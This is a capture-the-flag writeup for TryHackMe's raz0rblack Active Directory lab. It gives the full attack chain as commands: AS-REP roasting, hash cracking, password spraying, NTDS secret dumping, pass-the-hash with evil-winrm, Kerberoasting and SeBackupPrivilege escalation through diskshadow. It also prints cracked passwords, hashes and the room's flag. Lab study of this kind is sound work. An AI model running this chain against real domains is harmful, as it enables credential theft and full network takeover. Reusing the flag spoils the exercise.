raz0rblack by THM writeup
Greetings, dear kulkhatskers. This write-up will be dedicated to the passage of the car raz0rblack on TryHackMe
Disclaimer: all utilities and techniques demonstrated in the article are provided for educational purposes.
Step 0: Scan with Nmap
Traditionally, we start by scanning the network using Nmap
nmap -sC -sV -T4 10.10.215.15-sC -> option that starts script-based scanning
-sV -> determines the versions of services running on open ports
-T4 -> scan time
Hmm, doesn’t seem to be anything remarkable. Let’s try to enumerate NFS
Network File System (NFS) is a distributed file system that provides users with access to files located on remote computers and allows them to work with these files in the same way as with local ones
nmap -sV –script=nfs* 10.10.215.15 -p 111
Step 1: Use showmount
We can also find NFS using the utility showmount
showmount -e 10.10.215.15
Step 2: Mount /users
Create a mount point and mount the folder /users
mount -t nfs 10.10.215.15:/users ./creds
Having looked at its contents, we will see two files
The txt will contain our flag, but the xlsx will contain a list of users
dport
iroyce
tidal
aedwards
cingram
ncassidy
rzaydan
lvetrova
rdelgado
twilliams
sbradley
clinTo do this we will use the module GetNPUsers from the utility Impacket
GetNPUsers raz0rblack.thm/ -userfile /root/users.txt -dc-ip 10.10.215.15
The result of the utility will be an intercepted AS-REP user request twilliams
Step 4: Brute force using JohnTheRipper
Having intercepted the request, we can launch a local search to obtain the password in clear text. Let’s use the utility JohnTheRipper
john --rules --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Step 5: Use CrackMapExec
Knowing the account information, let’s run crackmapexec to enumerate users using RID brute force
crackmapexec smb 10.10.215.15 -u twilliams -p roastpotatoes --rid-brute
As a result of the work, we will obtain new valid users for further attack: xyan1d3, lvetrova, sbradley
Let’s use it again crackmapexec to spray password for specified users
Step 6: Use smbpasswd to change the password
As you can see, the user sbradley worth the status STATUS_PASSWORD_MUST_CHANGE. To change the password, use the utility smbpasswd
smbpasswd -r 10.10.215.15 -U sbradley
-r -> option to specify the address of the remote machine
-U -> option to specify user
Step 7: Forward smbmap
Next we will use the utility SMBMap
Next we will use the utility SMBMap
SMBMap allows users to list samba shared drives across an entire domain. The program compiles a list of shared disks, disk access rights, shared content, has upload/download functionality, automatic downloading of files whose name matches the sample, and even the ability to remotely execute commands. This tool was created for penetration testing and is designed to make it easier to find potentially sensitive data in large networks
smbmap -H 10.10.215.15 -u sbradley -p password
As a result, we will see a list of available shares. Most likely we will be interested /trash
Step 8: Connect via smbclient
To view potentially interesting files, connect via smb using smbclient
smbclient //10.10.215.15/trash --user="sbradley%password"
Let’s download the available files. These will include a password-protected archive
Step 9: Use zip2john
To crack the archive password, we will use utilities Zip2John And JohnTheRipper
zip2john experiment_gone_wrong.zip > zip_hash.txtjohn --rules --wordlist=/usr/share/wordlists/rockyou.txt zip_hash.txt
Having received the password in clear text, unpack the archive which contains system.hive And ntds.dit
Step 10: Retrieving secrets from files
To locally extract user secrets we will use the module secretsdump from the utility Impacket
impacket-secretsdump --system system.hive -ntds ntds.dit LOCAL > dump.txt
To separate hashes from a file, use the following command
Step 11: CrackMapExec to find a suitable hash
To select a hash for a user lvetrova Let’s use the utility again crackmapexec
crackmapexec smb 10.10.215.15 -u lvetrova -H hashes.txt
Step 12: Evil-WinRM
For remote connection we will use Evil-WinRM
evil-winrm -i 10.10.15.215 -u lvetrova -H f220d3988deb3f516c73f40ee16c431dHaving looked at the contents of the user’s folder, we will see the file lvetrova.xml
PowerShell has a method for storing encrypted credentials that can only be accessed by the user account that saved them. The above code prompts for credentials and then stores them encrypted in an XML file. As a result, we get the user flag lvetrova
Step 13: Conduct kerberoasting
Next, knowing the username and hash of his password, we will carry out the attack Kerberoastingusing GetUserSPNsby requesting TGS
GetUserSPNs -dc-ip 10.10.215.15 raz0black.thm\lvetrova -hashes f220d3988deb3f516c73f40ee16c431d:f220d3988deb3f516c73f40ee16c431d -outputfile kerb.txt
Also, having intercepted TGS, we will use john for local password search
john --rules --wordlist=/usr/share/wordlists/rockyou.txt kerb.txt
Step 14: Evil-WinRM with xyan1d3 data
evil-winrm -i 10.10.215.15 -u xyan1d3 -p cyanide9amine5628whoami /all
The user has privilege SeBackupPrivilege. It was designed for the purpose of creating backup copies for users. This privilege should bypass any ACLs set by the administrator on the network. So, in a nutshell, this privilege allows the user to read any file on the entire file system, which may also include some sensitive files such as the SAM file or the SYSTEM registry file. From an attacker’s perspective, this privilege can be exploited after gaining a foothold on the system and then going into an elevated shell, reading SAM files and possibly cracking the passwords of highly privileged users on the system or network
To implement privilege escalation, we need a utility diskshadow.exescript and two DLLs: SeBackupPrivilegeUtils.dll And SeBackupPrivilegeCmdLets.dll
Let’s also create the following script to perform shadow copying and call it diskshadow.txt:
set verbose onX
set metadata C:\Windows\Temp\meta.cabX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backupXset verbose onX -> will output detailed execution information
set metadata -> specifies the location of the metadata file for creating shadow copies
set context persistentX -> installs a persistent shadow copy that will persist after the Diskshadow exit command and will survive a computer reboot
begin backupX -> starts the shadow copy process
add volume C: alias cdriveX -> Alias gives a name to the shadow identifier
createX -> creates a snapshot virtual disk on the DataCore Server and services the virtual disk on the same computer
expose %cdrive% E:X -> Reveals the shadow identifier to the operating system and assigns the letter X to the specified drive:
end backupX -> ends the shadow copy process
Load the script using the command:
upload diskshadow.txtWe will also download 2 DLLs, which can be downloaded from here:
wget https://github.com/giuliano108/SeBackupPrivilege/raw/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dllwget https://github.com/giuliano108/SeBackupPrivilege/raw/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dlland also download them via the command upload. After loading the DLL for operation, we will write the following:
import-module .\SeBackupPrivilegeCmdLets.dllimport-module .\SeBackupPrivilegeCmdLets.dllHaving completed all the procedures, we launch our script through the utility diskshadow.exe
diskshadow.exe /s C:\tmp\diskshadow.txt/s-> specifies the location of the script
After successfully creating a shadow copy, use the utility robocopy
robocopy /b E:\windows\ntds . ntds.dit/b -> copies files in backup mode, which allows Robocopy to override file and folder permission settings (ACLs). This allows you to copy files that you might not otherwise have access to, as long as they are running under an account with sufficient privileges
After that, copy the registry hive SYSTEM via the reg save command and download our files
reg save HKLM\SYSTEM C:\tmp\system
Step 15: Get the credentials again
After downloading files ntds.dit And system Let’s make a local dump of secrets from these files using secretsdump
impacket-secretsdump -system system -ntds ntds.dit LOCAL
Step 16: Connect with admin credentials
Having received the administrator hash, we will connect using the same evil-winrm
evil-winrm -i 10.10.215.15 -u administrator -H 9689931bed40ca5a2ce1218210177f0cLet’s view the contents of the administrator folder
By using type let’s open the file root.xml
This is our flag. Convert from hex to plain text:
Here is your Root Flag
THM{1b4f46cc4fba46348273d18dc91da20d}Let’s also find the user flag twilliams
And the final touch: after looking at all the folders, we will find the directory Top Secretwe’ll see the picture there and download it
That’s all we wanted to show in this analysis. Remember: there are no 100% resistant systems. Practice, because absolutely any pentester will be nowhere without it!
